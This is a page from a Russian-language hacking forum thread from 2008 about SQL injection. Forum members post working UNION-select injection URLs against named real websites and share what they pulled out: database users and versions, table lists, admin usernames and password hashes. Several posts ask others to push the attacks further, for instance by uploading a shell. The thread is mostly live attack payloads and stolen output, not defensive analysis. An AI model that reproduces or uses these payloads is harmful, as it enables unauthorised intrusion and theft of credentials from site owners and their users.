SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    DBname: israemploy
    User: israemploy@localhost
    Version: 5.0.45-log

    админку не нашол(( кто найдет - в личку плз.
     
    1 person likes this.
  2. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    http://crimeahouse.ru/index.php?pageId=24&id=-111+union+select+1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57--
    crimeahouseru@localhost:5.0.26-log:dbm_www_crimeahouse_ru

    http://crimeahouse.ru/index.php?pageId=24&id=-111+union+select+1,2,3,4,5,mail,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57+from+mail+limit+723,1--
    мыльники - самое интересное, что можно вытащить, кажется >_>
    ________________

    http://www.makc-m.nnov.ru/faq.php?id_faq=-155+union+select+1,2,3,4,5
    http://www.makc-m.nnov.ru/faq.php?id_faq=-155+union+select+1,table_name,3,4,5+from+information_schema.tables+limit+0,1--
    Code:
    SELECT * FROM faq WHERE id_faq=-155 union select 1,table_name,3,4,5 from information_schema.tables limit 0,1--
    Error: SELECT command denied to user 'makcm'@'localhost' for table 'tables'
    К сожалению, сервис Вопрос-Ответ недоступен
     
    #6222 Calcutta, 11 Aug 2008
    Last edited: 11 Aug 2008
  3. Momiji

    Momiji Elder - Старейшина

    Joined:
    25 Aug 2007
    Messages:
    495
    Likes Received:
    348
    Reputations:
    127
    fabbrigroup.com
    Code:
    http://www.fabbrigroup.com/rides.php?cat=-9+union+select+concat(0x3,version())/*
    5.0.45fabbrigroup_com@localhostfabbrigroup_com
    Code:
    http://www.fabbrigroup.com/rides.php?cat=-9+union+select+password+from+fabbrigroup_users+limit+0,1/*
    admin:aec5dd86377b6754b9509a775a0e2a26:ruotino
     
    4 people like this.
  4. MirA

    MirA Member

    Joined:
    24 Jul 2008
    Messages:
    25
    Likes Received:
    16
    Reputations:
    0
    http://www.realestate.com.pr
    5 ветка
    админку не нашел..

    http://www.pumpi.com.mk
    version = 4
    forbidden http://www.pumpi.com.mk/admin/

    http://www.pumpi.com.mk
    version = 4

    http://www.nibm.com.mk
    4 ветка
    админка

    http://www.sport.gov.mo
    4 version
    есть табличка users c полями username,password
    username = cat
    password = catch
    только вот не подходят они...(

    http://www.uni-care.com.mo

    5 ветка
    директория C:\Inetpub\vhosts\uni-care.com.mo\httpdocs\info_detail.php

    http://www.cpttm.org.mo

    4 ветка
    директория D:\wwwroot2\news.php

    http://www.lev.me

    version() = 4.0.27-max-log
     
    #6224 MirA, 11 Aug 2008
    Last edited: 12 Aug 2008
  5. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    1,2,3,4,5,6,7,8

    User:[email protected]
    Database:congres_hrep
    Version:4.0.24_Debian-10sarge2-log
     
  6. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    http://fastflowerstoukraine.com/index.php?pageid=5+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
    кто раскрутит до конца?

    http://schalter.ru/page.php?id_level=
     
    #6226 Calcutta, 12 Aug 2008
    Last edited: 12 Aug 2008
  7. nicusor

    nicusor Elder - Старейшина

    Joined:
    19 Mar 2008
    Messages:
    105
    Likes Received:
    38
    Reputations:
    0
    обходим гору

    http://fastflowerstoukraine.com/local/plug-in/a-price/showone.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13,14,15,16,17/*
     
  8. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    http://fastflowerstoukraine.com/local/plug-in/a-price/showone.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,table_name),7,8,9,10,11,12,13,14,15,16,17+from+information_schema.tables+limit+0,1/**
    а дальше?
     
  9. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Dbname: videsinvfonds
    Version: 5.0.24
    User:videsinvfonds@localhost

    логиниться - нелогинится..продолжение в админках)
     
  10. nicusor

    nicusor Elder - Старейшина

    Joined:
    19 Mar 2008
    Messages:
    105
    Likes Received:
    38
    Reputations:
    0
    переходим в Ваши вопросы по уязвимостям. https://forum.antichat.ru/lastpostinthread46016.html
     
  11. Momiji

    Momiji Elder - Старейшина

    Joined:
    25 Aug 2007
    Messages:
    495
    Likes Received:
    348
    Reputations:
    127
    therapyshoppe.com
    Code:
    http://www.therapyshoppe.com/product.php?cat=-8+union+select+1,concat_ws(0x3a3a,version(),user(),database())/*
    5.0.45-log::[email protected]::therapyshoppe
    Code:
    http://www.therapyshoppe.com/product.php?cat=-8+union+select+1,concat(table_name,0x3a3a3a,table_schema)+from+information_schema.tables+limit+20,1/*
    Список таблиц:
    Code:
    categories
    descriptions
    products
    specials
    Собственно нечего интересного(
     
  12. luz3r

    luz3r Banned

    Joined:
    23 Feb 2008
    Messages:
    119
    Likes Received:
    250
    Reputations:
    -11
    http://www.cageprisoners.com/

    HTML:
    http://www.cageprisoners.com/articles.php?id=25632'+order+by+6/*
    Кол-во столбцов =6

    HTML:
    http://www.cageprisoners.com/articles.php?id=-25632+union+select+1,2,3,4,5,6/*
    version : 5.0.45
    database : cagepris_cms
    user : cagepris_cms@localhost

    HTML:
    http://www.cageprisoners.com/articles.php?id=-25632+union+select+1,2,table_name,4,5,6+from+information_schema.tables+limit+17,10/*
    Таблица - admins

    Хеш пароля : QYYoUiD1cbIlTi2jPbgoQ0

    Админка:
    HTML:
    http://www.cageprisoners.com/admin/login.php?accessdenied=%2Fadmin%2F
    P.S. Подскажите что за вид хеша!?
     
    #6232 luz3r, 12 Aug 2008
    Last edited: 12 Aug 2008
    1 person likes this.
  13. MirA

    MirA Member

    Joined:
    24 Jul 2008
    Messages:
    25
    Likes Received:
    16
    Reputations:
    0
    http://allmitino.ru
    5-ая ветка
    есть таблички phpbb_users,allm_admin,allm_users

    админка

    katie:::03e682cf75e3b31d
    kirill:::10edb41c7e718497

    пароли вроде шифровались mysql
     
    #6233 MirA, 12 Aug 2008
    Last edited: 12 Aug 2008
    1 person likes this.
  14. BanQui

    BanQui Elder - Старейшина

    Joined:
    10 Jul 2008
    Messages:
    68
    Likes Received:
    18
    Reputations:
    -11
    Люди посматрите пожалуйста ентот сайт http://pw.spark-games.ru/indexx.php (попрошу обратить внимание на мини чат!) Вот регистрация тоже не понятно http://pw.spark-games.ru/registration.php попробуйте зарегить новый акк есть ошибки скульные!
     
  15. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    PR-6 от гарварда сайтек какой-то.
    42
    name:p[email protected]
    Version:4.1.20-log
    Dbname:news
     
    1 person likes this.
  16. t0ox

    t0ox Member

    Joined:
    23 Oct 2007
    Messages:
    17
    Likes Received:
    16
    Reputations:
    0
    Code:
    http://www.hq-video.ru/details.php?id=-999999+union+select+1,2,concat(version(),0x3a,user (),0x3a,database()),4,5/*
    5.0.26
    root@localhost
    hqvideo

    Code:
    http://www.hq-video.ru/details.php?id=-999999+union+select+1,2,concat(table_schema,0x3a,t able_name,0x3a,column_name),4,5+from+information_s chema.columns/*
    http://www.hq-video.ru/details.php?id=-999999+union+select+1,2,concat(table_name,0x3a,col umn_name),4,5+from+information_schema.columns/*
    кто шэл зальёт опешитесь
     
  17. PandoraBox

    PandoraBox Elder - Старейшина

    Joined:
    6 May 2007
    Messages:
    262
    Likes Received:
    176
    Reputations:
    7
    Code:
    http://www.profvideo.ru/index.php?ids=-501+union+select+1,2,version(),concat_ws(0x3a3a,user(),database()),5,6,7,8,9,10,11,12/*
    4.1.22
    profvideo@localhost
    profvideo
     
  18. Glazz

    Glazz Elder - Старейшина

    Joined:
    9 Aug 2008
    Messages:
    116
    Likes Received:
    7
    Reputations:
    0
    Ошибки при реге , это у них SQL сервер недоступен/орублен.
     
  19. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    Интернет-магазин:
    http://webkoleso.ru/index.php?pageId=-111111+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9--
    _________________________________________
    edited:
    http://magazine.ge/index.php?page=events&id=22+union+select+1,2,3,4,5,6,7,8,9--

    http://svrwheels.ru/index.php?pageId=-111+union+select+1,2,3,4,5,6,7,8--

    http://ihf-hr.org/documents/doc_summary.php?sec_id=1+union+select+1,concat_ws(0x3a,version(),user(),database()),3-- <<<----с дальнейшим выводом проблемы :-/
     
    #6239 Calcutta, 13 Aug 2008
    Last edited: 13 Aug 2008
  20. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    Code:
    http://vesnasouvenir.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
    http://trol.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
    http://expoland.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
    http://vesnaboard.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
    http://www.eva.dp.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
    http://www.cifrotech.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
    http://ops-print.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
    http://vesnanaruzhka.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
    http://vp.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
    http://www.kominmet.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
    http://piton.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
    
    Все сайты управляются отсюда
    http://www.as-admin.com/index.php
    Жаль такого на юкоз нету :D
     
    #6240 S0ulVortex, 13 Aug 2008
    Last edited: 16 Aug 2008
Thread Status:
Not open for further replies.